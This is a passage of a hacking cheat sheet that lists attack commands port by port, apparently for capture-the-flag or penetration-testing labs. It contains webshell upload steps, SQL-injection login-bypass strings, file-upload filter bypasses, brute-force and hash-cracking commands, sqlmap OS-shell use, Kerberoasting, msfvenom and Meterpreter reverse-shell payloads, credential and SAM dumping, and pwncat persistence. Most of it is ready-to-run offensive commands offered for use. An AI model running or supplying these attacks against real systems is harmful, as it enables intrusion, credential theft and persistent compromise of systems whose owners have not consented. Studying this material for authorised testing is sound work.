10.0.0.1 221 | FTP anonymous sign in 222 | mget * #download everything 223 | 224 | #can we upload file as anonymous? 225 | #if so we can try upload a cmd webshell and execute commands 226 | locate cmd.aspx #if iis 227 | put cmd.aspx 228 | #browse to the file: 229 | http://IP/cmd.aspx 230 | 231 | #we can also try to create a shell payload with msfvenum and upload it 232 | ``` 233 | 234 | ## **SSH (22):** 235 | 236 | ```bash 237 | ssh INSERTIPADDRESS 22 238 | 239 | nc IP 22 240 | 241 | nmap -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst --script-args ssh-brute.timeout=4s 242 | 243 | #downloading 244 | scp username@hostname:/path/to/remote/file /path/to/local/file 245 | ``` 246 | 247 | If NMAP show "SSH Filtered" it means that [port knocking](https://blog.rapid7.com/2017/10/04/how-to-secure-ssh-server-using-port-knocking-on-ubuntu-linux/) is enable 248 | 249 | ```bash 250 | #we need to find the /etc/knockd.conf (thorough LFI or FTP or something else) 251 | #inside there is a sequence 252 | knock IP SEQUENCE1 SEQUENCE2 SEQUENCE3 253 | #check nmap again 254 | ``` 255 | 256 | ## **SMTP Enumeration (25):** 257 | 258 | ```bash 259 | nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1 260 | ``` 261 | 262 | ```bash 263 | nc -nvv INSERTIPADDRESS 25 264 | ``` 265 | 266 | ```bash 267 | telnet INSERTIPADDRESS 25 268 | ``` 269 | 270 | ```jsx 271 | use auxiliary/scanner/smtp/smtp_enum 272 | msf auxiliary(smtp_enum) > set rhosts 192.168.1.107 273 | msf auxiliary(smtp_enum) > set rport 25 274 | msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt 275 | msf auxiliary(smtp_enum) > exploitw 276 | ``` 277 | 278 | ## DNS (53) 279 | 280 | ```bash 281 | #DNS zone transfer 282 | sudo nano /etc/hosts 283 | 10.10.10.123 friendzone.red 284 | host -l friendzone.red 10.10.10.123 285 | ``` 286 | 287 | ## **Finger Enumeration (79):** 288 | 289 | Download script and run it with a wordlist: [http://pentestmonkey.net/tools/user-enumeration/finger-user-enum](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum) 290 | 291 | ```bash 292 | finger-user-enum.pl [options] (-u username|-U users.txt) (-t host|-T ips.txt)( 293 | ``` 294 | 295 | ## **Web Enumeration (80/443):** 296 | 297 | [extra enumeration from hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) 298 | 299 | if we get default apache page, try entering IP to HOSTS 300 | 301 | Before dirbusting, try going to index.php or index.html to know which extention to look for 302 | 303 | ```bash 304 | dirbuster (GUI) 305 | #1st try without "be recursive" 306 | ``` 307 | 308 | ```powershell 309 | cd ~/tools 310 | ./feroxbuster -u URL -w WORDLIST -x EXT -C 403 -t 100 311 | ``` 312 | 313 | ```bash 314 | Web Extensions 315 | 316 | sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar 317 | ``` 318 | 319 | ```bash 320 | dirb http://target.com /path/to/wordlist 321 | dirb http://target.com /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.pl,.bak,.old 322 | ``` 323 | 324 | ```bash 325 | gobuster dir -u https://target.com -b 403 ms-w /usr/share/wordlists/dirb/big.txt -x .txt,.php 326 | use -r (recursive) or try found folders 327 | ``` 328 | 329 | ```bash 330 | nikto –h 10.0.0.1 #web vulnerability scanner 331 | ``` 332 | 333 | ```jsx 334 | owasp zap 335 | ``` 336 | 337 | ```bash 338 | Look for Default Credentials 339 | ``` 340 | 341 | ```bash 342 | sql 343 | ``` 344 | 345 | - View Page Source 346 | 347 | ```bash 348 | Hidden Values 349 | Developer Remarks 350 | Extraneous Code 351 | Passwords! 352 | ``` 353 | 354 | - burpsuite 355 | 356 | ```bash 357 | compare “host:” 358 | crsf token = no bruteforce 359 | add php code if url has anything.php 360 | <L> 361 | anything being executed? 362 | try directory traversal 363 | ../../../home 364 | ``` 365 | 366 | - sign in page 367 | 368 | ```bash 369 | SQL Injection 370 | 371 | ‘or 1=1– – 372 | ‘ or ‘1’=1 373 | ‘ or ‘1’=1 — – 374 | ‘– 375 | Use known Username 376 | tyler’ — – 377 | tyler’) — – 378 | 379 | #bruteforce 380 | hydra -L <username list> -p <password list> <IP Address> <form parameters><failed login message> 381 | ``` 382 | 383 | - file upload 384 | 385 | ```bash 386 | 387 | #if NMAP show something like: Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND 388 | #we want to check if we can upload files 389 | davtest -url http://IP 390 | #if we see succedd we can use curl to upload: 391 | curl -X PUT http://10.10.10.15/df.txt -d @test.txt 392 | #and execute it: 393 | **curl http://10.10.10.15/df.txt** 394 | 395 | Blacklisting bypass 396 | bypassed by uploading an unpopular php extensions. such as: pht, phpt, phtml, php3, php4, php5, php6 397 | Whitelisting bypass 398 | passed by uploading a file with some type of tricks, Like adding a null byte injection like ( shell.php%00.gif ). Or by using double extensions for the uploaded file like ( shell.jpg.php) 399 | ``` 400 | 401 | - Wfuzz - Subdomain brute forcer, replaces a part of the url like username with wordlist 402 | 403 | ```bash 404 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test 405 | 406 | wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ 407 | 408 | wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ" 409 | 410 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ 411 | 412 | wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ 413 | ``` 414 | 415 | - [Knockpy](https://github.com/guelfoweb/knock) - enumerate subdomains on a target domain through a wordlist 416 | 417 | ```bash 418 | knockpy domain.com 419 | ``` 420 | 421 | - wpscan - if wordpress found 422 | 423 | ```bash 424 | wpscan --url [http://:80$target](http://:80$target) --enumerate u,t,p | tee $target-wpscan-enum 425 | #if we can enter wordpres, we can change the 404 page to php reverse shell code and gain access 426 | ``` 427 | 428 | - joomscan - if joomla found 429 | 430 | ```powershell 431 | 432 | cd ~/tools/joomscan 433 | perl joomscan.pl -u http://10.10.10.150/administrator/ 434 | ``` 435 | 436 | ## If A File is found 437 | 438 | - steghide - check pictures for hidden files 439 | 440 | ```bash 441 | apt-get install steghide 442 | 443 | steghide extract -sf picture.jpg 444 | 445 | steghide info picture.jpg 446 | 447 | apt-get install stegosuite 448 | ``` 449 | 450 | - [Stegseek](https://github.com/RickdeJager/stegseek) - lightning fast steghide cracker to extract hidden data from files 451 | 452 | ```bash 453 | stegseek [stegofile.jpg] [wordlist.txt] 454 | ``` 455 | 456 | - binwalk - extract hidden files from files (steganography) 457 | 458 | ```bash 459 | binwalk FILE.JPG 460 | #if something was found 461 | binwalk -e FILE 462 | ``` 463 | 464 | - strings - check strings in files 465 | 466 | ```bash 467 | stringe FILE.jpg 468 | ``` 469 | 470 | - [exiftool](https://github.com/exiftool/exiftool) - pictures metadata 471 | - zip2john - prepare an encrpyted zip file for john hacking 472 | 473 | ```bash 474 | zip2john ZIPFILE > zip.hashs 475 | ``` 476 | 477 | - SQLite DB 478 | 479 | ```powershell 480 | #if we found a flat-file db 481 | file EXAMPLE.db 482 | #if sqlite3 483 | sqlite3 <database-name> 484 | .tables 485 | PRAGMA table_info(customers); 486 | SELECT * FROM customers; 487 | ``` 488 | 489 | - sqlmap - check website for sql injection (more info down) 490 | 491 | [Sqlmap trick](https://hackertarget.com/sqlmap-post-request-injection/) - if we have a login page, we can try admin:admin, catch that in burpsuite, save the full request to a file, run: 492 | 493 | ```bash 494 | sqlmap -r FILENAME --level=5 --risk=3 --batch 495 | sqlmap -r FILENAME -dbs --level=5 --risk=3 --batch 496 | 497 | sqlmap -r FILENAME --dbs #enumarate DB's 498 | sqlmap -r FILENAME -D DB_Name --tables #enumarate tables 499 | sqlmap -r FILENAME -D DB_Name -T TABLE_Name --dump #DUMP table 500 | 501 | #Find SQL in webpage url automatically 502 | sqlmap -u https://IP/ –crawl=1 503 | 504 | #with authentication 505 | sqlmap -u “http://target_server” -s-data=param1=value1&param2=value2 -p param1--auth-type=basic --auth-cred=username:password 506 | 507 | #Get A Reverse Shell (MySQL) 508 | sqlmap -r post_request.txt --dbms "mysql" --os-shell 509 | ``` 510 | 511 | - [fimap](https://github.com/kurobeats/fimap) - Check for LFI, find, prepare, audit, exploit and even google automatically for local and remote file inclusion 512 | 513 | ```bash 514 | ~/tools/fimap/src/fimap.py –H –u http://target-site.com/ -w output.txt 515 | ``` 516 | 517 | If we see in burpsuite php$url= we need to test for LFI (try /etc/passwrd) 518 | 519 | ```bash 520 | http://$ip/index.php?page=/etc/passwd 521 | http://$ip/index.php?file=../../../../etc/passwd 522 | ``` 523 | 524 | ## if a page redirects to another, we can use burp to stop 525 | 526 | ```bash 527 | Proxy -> Options -> Match and Replace 528 | ``` 529 | 530 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled.png) 531 | 532 | ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%201.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%201.png) 533 | 534 | ## kerberos (88): 535 | 536 | ```powershell 537 | tel#add host to /etc/hosts 538 | sudo gedit /etc/hosts 539 | 540 | ./GetUserSPNs.py -request active.htb/SVC_TGS > admin.txt 541 | #the password we will get will be encrypted 542 | john admin.txt --wordlist=/usr/share/wordlists/rockyou.txt 543 | 544 | #with the cracked password... 545 | psexec.py administrator@active.htb 546 | ``` 547 | 548 | ## **Pop3 (110):** 549 | 550 | ```bash 551 | telnet INSERTIPADDRESS 110 552 | ``` 553 | 554 | ```bash 555 | USER [username] 556 | ``` 557 | 558 | ```bash 559 | PASS [password] 560 | ``` 561 | 562 | - To login 563 | 564 | ```bash 565 | LIST 566 | ``` 567 | 568 | - To list messages 569 | 570 | ```bash 571 | RETR [message number] 572 | ``` 573 | 574 | - Retrieve message 575 | 576 | ```bash 577 | QUIT 578 | ``` 579 | 580 | ```bash 581 | quits 582 | ``` 583 | 584 | ## RPC (135) 585 | 586 | ```bash 587 | rpcclient --user="" --command=enumprivs -N $ip #Connect to an RPC share without a username and password and enumerate privledges 588 | rpcclient --user="<Username>" --command=enumprivs $ip #Connect to an RPC share with a username and enumerate privledges 589 | ``` 590 | 591 | ## **RPCBind (111):** 592 | 593 | ```bash 594 | rpcinfo –p x.x.x.x 595 | ``` 596 | 597 | ## **SMB\RPC Enumeration (139/445):** 598 | 599 | ```bash 600 | smbmap -H 10.10.10.149 601 | ``` 602 | 603 | ```bash 604 | smbclient -L \\\\10.0.0.100\\ 605 | smbclient \\\\10.0.0.100\\Replication 606 | prompt off #doesnt prompt of us downloading 607 | recurse on` #download all the files 608 | mget *` #download all files in this share 609 | 610 | ``` 611 | 612 | ```bash 613 | enum4linux -a 10.0.0.1 #Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing 614 | ``` 615 | 616 | ```bash 617 | nbtscan x.x.x.x #Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain 618 | ``` 619 | 620 | ```bash 621 | ridenum.py 192.168.XXX.XXX 500 50000 dict.txt 622 | ``` 623 | 624 | ```bash 625 | python /home/hasamba/tools/impacket/build/scripts-3.8/samrdump.py 192.168.XXX.XXX 626 | ``` 627 | 628 | ```bash 629 | nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse $IP 630 | ``` 631 | 632 | smb4k on Kali, useful Linux GUI for browsing SMB shares 633 | 634 | ```bash 635 | apt-get install smb4k -y 636 | ``` 637 | 638 | - on Windows: 639 | - Download All Files From A Directory Recursively 640 | 641 | ```bash 642 | smbclient '\\server\share' -N -c 'prompt OFF;recurse ON;cd 'path\to\directory\';lcd '~/path/to/download/to/';mget *' 643 | ``` 644 | 645 | ```bash 646 | net use \\TARGET\IPC$ "" /u:"" #Manual Null session testing 647 | ``` 648 | 649 | ## **SNMP Enumeration (161):** 650 | 651 | - Fix SNMP output values so they are human readable: 652 | 653 | ```bash 654 | apt-get install snmp-mibs-downloader download-mibs 655 | echo "" > /etc/snmp/snmp.conf 656 | ``` 657 | 658 | ```bash 659 | snmpwalk -c public -v1 192.168.1.X 1| 660 | grep hrSWRunName|cut -d* * -f 661 | ``` 662 | 663 | ```bash 664 | snmpcheck -t 192.168.1.X -c public 665 | ``` 666 | 667 | ```bash 668 | onesixtyone -c names -i hosts 669 | ``` 670 | 671 | ```bash 672 | nmap -sT -p 161 192.168.X.X -oG snmp_results.txt 673 | nmap -n -vv -sV -sU -Pn -p 161,162 –script=snmp-processes,snmp-netstat IP 674 | ``` 675 | 676 | ```bash 677 | snmpenum -t 192.168.1.X 678 | ``` 679 | 680 | ```bash 681 | onesixtyone -c names -i hosts 682 | ``` 683 | 684 | ```bash 685 | #metasploit 686 | auxiliary/scanner/snmp/snmp_enum 687 | auxiliary/scanner/snmp/snmp_enum_hp_laserjet 688 | auxiliary/scanner/snmp/snmp_enumshares 689 | auxiliary/scanner/snmp/snmp_enumusers 690 | auxiliary/scanner/snmp/snmp_login 691 | ``` 692 | 693 | ## **Oracle (1521):** 694 | 695 | ```bash 696 | tnscmd10g version -h INSERTIPADDRESS 697 | ``` 698 | 699 | ```bash 700 | tnscmd10g status -h INSERTIPADDRESS 701 | ``` 702 | 703 | ## LDAP (389) 704 | 705 | [JXplorer - an open source LDAP browser](http://jxplorer.org/) 706 | 707 | ## MSSQL (1433) 708 | 709 | ```bash 710 | nmap -n -v -sV -Pn -p 1433 –script ms-sql-brute –script-args userdb=users.txt,passdb=passwords.txt IP 711 | nmap -n -v -sV -Pn -p 1433 –script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password IP 712 | ``` 713 | 714 | [Hunting for MSSQL | Offensive Security](https://www.offensive-security.com/metasploit-unleashed/hunting-mssql/) 715 | 716 | ## **Mysql Enumeration (3306):** 717 | 718 | ```bash 719 | nmap -sV -Pn -vv 10.0.0.1 -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 720 | 721 | mysql –h IP -u root -p 722 | show databases; 723 | show tables; 724 | use tablename; 725 | describe table; 726 | select table1, table2 from tablename; 727 | ``` 728 | 729 | ## Active Directory 730 | 731 | ```bash 732 | # current domain info 733 | [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() 734 | 735 | # domain trusts 736 | ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() 737 | 738 | # current forest info 739 | [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() 740 | 741 | # get forest trust relationships 742 | ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships() 743 | 744 | # get DCs of a domain 745 | nltest /dclist:offense.local 746 | net group "domain controllers" /domain 747 | 748 | # get DC for currently authenticated session 749 | nltest /dsgetdc:offense.local 750 | 751 | # get domain trusts from cmd shell 752 | nltest /domain_trusts 753 | 754 | # get user info 755 | nltest /user:"spotless" 756 | 757 | # get DC for currently authenticated session 758 | set l 759 | 760 | # get domain name and DC the user authenticated to 761 | klist 762 | 763 | # get all logon sessions. Includes NTLM authenticated sessions 764 | klist sessions 765 | 766 | # kerberos tickets for the session 767 | klist 768 | 769 | # cached krbtgt 770 | klist tgt 771 | 772 | # whoami on older Windows systems 773 | set u 774 | 775 | # find DFS shares with ADModule 776 | Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name 777 | 778 | # find DFS shares with ADSI 779 | $s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name} 780 | 781 | # check if spooler service is running on a host 782 | powershell ls "\\dc01\pipe\spoolss" 783 | ``` 784 | 785 | ## MSSQL 786 | 787 | Try using "Browse for More" via MS SQL Server Management Studio 788 | 789 | Enumeration / Discovery: 790 | 791 | Nmap: 792 | 793 | ```bash 794 | nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156 795 | ``` 796 | 797 | Metasploit: 798 | 799 | ```bash 800 | msf > use auxiliary/scanner/mssql/mssql_ping 801 | ``` 802 | 803 | ### Bruteforce MSSQL Login 804 | 805 | ```bash 806 | msf > use auxiliary/admin/mssql/mssql_enum 807 | ``` 808 | 809 | ### Metasploit MSSQL Shell 810 | 811 | ```bash 812 | msf > use exploit/windows/mssql/mssql_payload 813 | msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp 814 | ``` 815 | 816 | # Gaining Access 817 | 818 | - hydra: bruteforce tool 819 | 820 | ```bash 821 | hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.0.0.101 -t 4 -v -f 822 | #-l is the user we want to attack, -P password file list, -t threads, -v verbose 823 | #it's better to intercept the login page with burp, check to see the correct username&password syntax and copy the exact failed message 824 | -#f exit when a login/pass pair is found 825 | hydra -l hasamba -P ~/Desktop/test_passwords.txt 10.0.0.210 -s 8085 http-post-form "/login/:username=^USER^&password=^PASS^:F=Authentication failed" -VVV -t 6 - 826 | hydra OPT #will show us optional moduls for http and such 827 | hydra -U MODULE_NAME #will show module examples 828 | 829 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V #Hydra FTP brute force 830 | hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V #Hydra POP3 brute force 831 | hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V #Hydra SMTP brute force 832 | 833 | hydra -l username -P password-list <URL_TO_SERVER> http-post-form "<PATH-TO_LOGIN>:POST_REQUEST_FOR_LOGIN:FAILED_RESPONSE_IDENTIFIER" 834 | ``` 835 | 836 | - metasploit - can also bruteforce 837 | 838 | ```bash 839 | use auxialary/scanner/ssh/ssh_login 840 | options 841 | set username root 842 | set pass_file /usr/share... 843 | set rhosts 844 | set threads 10 845 | set verbose true 846 | run 847 | ``` 848 | 849 | - unshadow (kali) - combine both files and will insert the hashed passwords to the passwd file, so we can use this file with hashcat to maybe decrypt the password. 850 | 851 | ```bash 852 | unshadow PASSSWD_FILE SHADOW_FILE 853 | ``` 854 | 855 | - [hashcat](https://www.notion.so/Hashcat-b885f8ac8c0f450986d62c0d29f44cb9) - crack passwords hashes ([Cheat Sheet](https://s3.us-west-2.amazonaws.com/secure.notion-static.com/a44ab748-a9a9-437e-a4a1-2fa1cc6c03a8/HashcatCheatSheet.v2018.1b.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAT73L2G45O3KS52Y5%2F20201122%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20201122T190235Z&X-Amz-Expires=86400&X-Amz-Signature=03753b73d70b97901e6a764011ae5ffdbffc2d9dcbd00673f79b64097b1299d9&X-Amz-SignedHeaders=host&response-content-disposition=filename%20%3D%22HashcatCheatSheet.v2018.1b.pdf%22)) 856 | 857 | ```bash 858 | hashcat -m "OSCODE" unshadow.txt passwordFile.txt 859 | #from here: https://github.com/frizb/Hashcat-Cheatsheet 860 | hashcat --force -m300 --status -w3 -o found.txt --remove --potfile-disable -r rules\OneRuleToRuleThemAll.rule hash.txt rockyou.txt 861 | ``` 862 | 863 | - hash-identifier 864 | 865 | ```bash 866 | hash-identifier [hash] 867 | ``` 868 | 869 | - [name-that-hash](https://github.com/HashPals/Name-That-Hash) - better hash analyzer 870 | 871 | ```jsx 872 | 873 | ``` 874 | 875 | - cewl - create wordlist from a website 876 | 877 | ```bash 878 | cewl -v --with-numbers -e --email_file cewl_email.wordlist -w cewl.wordlist http://sneakycorp.htbme 879 | 880 | #my favorite rule to add: 881 | john --wordlist=wordlist.txt --rules=jumbo --stdout > wordlist-modified.txt 882 | 883 | hashcat --force cewl.wordlist -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words 884 | 885 | https://github.com/praetorian-inc/Hob0Rules 886 | ###hob064 This ruleset contains 64 of the most frequent password patterns 887 | hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/rockyou.txt -r hob064.rule -o cracked.txt 888 | 889 | ###d3adhob0 This ruleset is much more extensive and utilizes many common password structure ideas 890 | hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/english.txt -r d3adhob0.rule -o cracked.txt 891 | 892 | #adding John rules 893 | john --wordlist=wordlist.txt --rules --stdout > wordlist-modified.txt 894 | john --wordlist=wordlist.txt --rules=best64 --stdout > wordlist-modified.txt 895 | ``` 896 | 897 | - john the ripper - password cracker ([cheat sheet](https://drive.google.com/viewerng/viewer?url=https://countuponsecurity.files.wordpress.com/2016/09/jtr-cheat-sheet.pdf)) ([Jumbo community version](https://github.com/openwall/john)) 898 | 899 | ```bash 900 | john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt 901 | #after john finished, ask him to show 902 | john hashes.txt --show 903 | 904 | john 127.0.0.1.pwdump --wordlist=dictionary.txt --rules=Jumbo #with jumbo rules from https://github.com/openwall/john 905 | ``` 906 | 907 | [CyberChef](https://gchq.github.io/CyberChef/) 908 | 909 | [CrackStation - Online Password Hash Cracking - MD5, SHA1, Linux, Rainbow Tables, etc.](https://crackstation.net/) 910 | 911 | [Hash Analyzer](https://www.tunnelsup.com/hash-analyzer/) 912 | 913 | [Cipher Identifier (online tool) | Boxentriq](https://www.boxentriq.com/code-breaking/cipher-identifier) 914 | 915 | - msfvenom(kali) - tool to create malware 916 | 917 | ```bash 918 | msfvenom -p windows/meterpreter/reverse_tcp LHOSTS=10.10.10.14 LPORT=4444 -f aspx > ex.aspx 919 | 920 | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war 921 | ``` 922 | 923 | - [responder (imapcket)](https://www.notion.so/responder-imapcket-b7bdbbb91ce74e98834dd88ec1715528) - MITM - listening in the background and wait for a failed dns request 924 | 925 | ```bash 926 | responder -I eth0 -rdwv #Run Responder.py for the length of the engagement while you're working on other attack vectors. 927 | ``` 928 | 929 | # Post Exploitation 930 | 931 | ## Useful commands running locally on the Linux system To quickly analyze the system and possibly help to escalate privileges 932 | 933 | - whoami - shows the user we logged in with 934 | - history - show last history, it usually can show any password or personal stuff the user execute 935 | - sudo -l - show what programs we can run without sudo, check all process against [GTFOBins](https://gtfobins.github.io/) 936 | - if we get `(ALL, !root) /bin/bash`, we can exploit with [this](https://www.exploit-db.com/exploits/47502) 937 | - uname -a - will show us the linux version so we can search for a script that will escalate privileges 938 | - export - check system variables 939 | - processes 940 | 941 | ```bash 942 | ps -ef 943 | ps auxf 944 | ps auxfww 945 | ``` 946 | 947 | - find in files 948 | 949 | ```bash 950 | find . -name "*.java" -type f -exec fgrep -iHn "textToFind" {} \; 951 | find . -regex ".*\.\(c\|java\)" -type f -exec fgrep -iHn "textToFind" {} \; 952 | find / -maxdepth 4 -name *.conf -type f -exec grep -Hn "textToFind" {} \; 2>/dev/null 953 | # SUID files owned by root 954 | find / -uid 0 -perm -4000 -type f 2>/dev/null 955 | # SUID files owned by root and world readable 956 | find / -uid 0 -perm -u=s,o=r -type f -exec ls -la {} \; 2> /dev/null 957 | # SUID files 958 | find / -perm -4000 -type f 2>/dev/null 959 | # world writable directories 960 | find / -perm -2 -type d 2>/dev/null 961 | 962 | #find passwords in files and ignore errors and filter out the proc and other folders 963 | find . ! -path "*/proc/*" -type f -name "*" -exec fgrep -iHn password {} \; 964 | find . -type f \( -iname \*.conf -o -iname \*.cfg -o -iname \*.xml -o -iname \*.ini -o -iname \*.json -o -iname \*.sh -o -iname \*.pl -o -iname \*.py \) -exec fgrep -iHn password {} \; 2> /dev/null 965 | 966 | # find using several patterns read from file (patterns are delimited by new line) 967 | find . -type f -exec grep -iHFf patterns.txt {} \; 968 | 969 | # find password keyword in small files 970 | find . -type f -size -512k -exec fgrep -iHn password {} \; 971 | 972 | # reverse java jar files and find passwords there 973 | find . -name "*.jar" -type f -exec ~/jd-cli/jd-cli -oc -l -n -st {} \; | egrep -i -e "Location:" -e "password" | uniq 974 | ``` 975 | 976 | ```bash 977 | # check open ports and services listening 978 | netstat -anp 979 | 980 | # check defined hosts 981 | cat /etc/hosts 982 | 983 | # check local IP addresses and interfaces 984 | ifconfig -a 985 | 986 | # check route 987 | route -v 988 | 989 | # check filesystem 990 | df 991 | 992 | # check sudo privileges 993 | sudo -l 994 | 995 | # check crontab 996 | crontab -l 997 | 998 | # check inittab 999 | cat /etc/inittab 1000 | 1001 | # try to sniff traffic 1002 | tcpdump 1003 | tcpdump -s0 not port 22 -w trace.pcap 1004 | 1005 | # check known hosts 1006 | cat ~/.ssh/known_hosts 1007 | 1008 | # try access mails 1009 | head /var/mail/root 1010 | 1011 | # list groups, users 1012 | cat /etc/group 1013 | cat /etc/passwd 1014 | # with root privileges 1015 | cat /etc/shadow 1016 | 1017 | # check shared memory 1018 | ipcs -mp 1019 | 1020 | # logout 1021 | logout 1022 | 1023 | # close script session 1024 | Ctrl + D 1025 | ``` 1026 | 1027 | ## Scripts 1028 | 1029 | - [pwncat](https://github.com/calebstewart/pwncat) - pwncat is a post-exploitation platform for Linux targets 1030 | 1031 | ```bash 1032 | cd ~/tools 1033 | source pwncat-env/bin/activate 1034 | 1035 | # Connect to a bind sheql 1036 | pwncat connect://10.10.10.10:4444 1037 | pwncat 10.10.10.10:4444 1038 | pwncat 10.10.10.10 4444 1039 | # Listen for reverse shell 1040 | pwncat bind://0.0.0.0:4444 1041 | pwncat 0.0.0.0:4444 1042 | pwncat :4444 1043 | pwncat -lp 4444 1044 | # Connect via ssh 1045 | pwncat ssh://user:password@10.10.10.10 1046 | pwncat user@10.10.10.10 1047 | pwncat user:password@10.10.10.10 1048 | pwncat -i id_rsa user@10.10.10.10 1049 | # SSH w/ non-standard port 1050 | pwncat -p 2222 user@10.10.10.10 1051 | pwncat user@10.10.10.10:2222 1052 | # Reconnect utilizing installed persistence 1053 | # If reconnection failes and no protocol is specified, 1054 | # SSH is used as a fallback. 1055 | pwncat reconnect://user@10.10.10.10 1056 | pwncat reconnect://user@c228fc49e515628a0c13bdc4759a12bf 1057 | pwncat user@10.10.10.10 1058 | pwncat c228fc49e515628a0c13bdc4759a12bf 1059 | pwncat 10.10.10.10 1060 | 1061 | ^D 1062 | run enumerate.gather 1063 | 1064 | run escalate.auto exec 1065 | 1066 | ---OLD--- 1067 | 1068 | upload/download --help 1069 | 1070 | persist --help 1071 | persist --install 1072 | perist --status 1073 | persist --clean 1074 | 1075 | tamper --help 1076 | 1077 | busybox --install 1078 | 1079 | enum --help 1080 | enum --show --type sudo 1081 | enum --report enumaration.md 1082 | 1083 | privsec --help 1084 | privsec -l 1085 | privsec --escalate 1086 | privsec -e -u sysadmin 1087 | ``` 1088 | 1089 | - [sherlock](https://github.com/rasta-mouse/Sherlock) - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities. 1090 | - [windows exploit suggester](https://github.com/AonCyberLabs/Windows-Exploit-Suggester) - This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins. 1091 | - metasploit migrate process and search suggester 1092 | 1093 | ```bash 1094 | ps 1095 | migrate 1788 1096 | search suggester 1097 | ``` 1098 | 1099 | - [psexec](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/psexec%20d818d32588314cb68f8ca3db57a6e1ef.md), wmiexec.py or [smbexec.py](http://smbexec.py) - privilege escalation for windows 1100 | - [powershellempire](https://github.com/PowerShellEmpire/PowerTools) - windows privilege escalation 1101 | 1102 | ```bash 1103 | powershell -ep (ExecutionPolicy) bypass 1104 | . .\PowerView.ps1 1105 | Get-NetDomain 1106 | Get-NetDomainController 1107 | Get-DomainPolicy 1108 | (Get-DomainPolicy)."system access" 1109 | Get-NetUser 1110 | Get-NetUser | select cn /samaccountname/description 1111 | Get-UserProperty -Properties pwdlastset/logoncount/badpwdcount 1112 | Get-NetComputer -FullData(extra data) | select(like grep) OperatingSystem 1113 | Get-NetGroupMember -GroupName "Domain Admins" 1114 | Invoke-ShareFinder 1115 | Get-NetGPO | select displayname, whenchanged 1116 | 1117 | ``` 1118 | 1119 | - [bloodhound](https://github.com/BloodHoundAD/BloodHound) - easily identify highly complex attack paths 1120 | - crackmapexec - can take passwords or hashes that we found and check them against all computers on a network 1121 | 1122 | ```powershell 1123 | crackmapexec 192.168.57.0/24 -u fcastle -d MARVEL.local -p Password1 1124 | #Spray the network with local login credentials then dump SAM contents 1125 | crackmapexec smb 10.0.0.1/24 -u administrator -p 'password' --local-auth --sam 1126 | 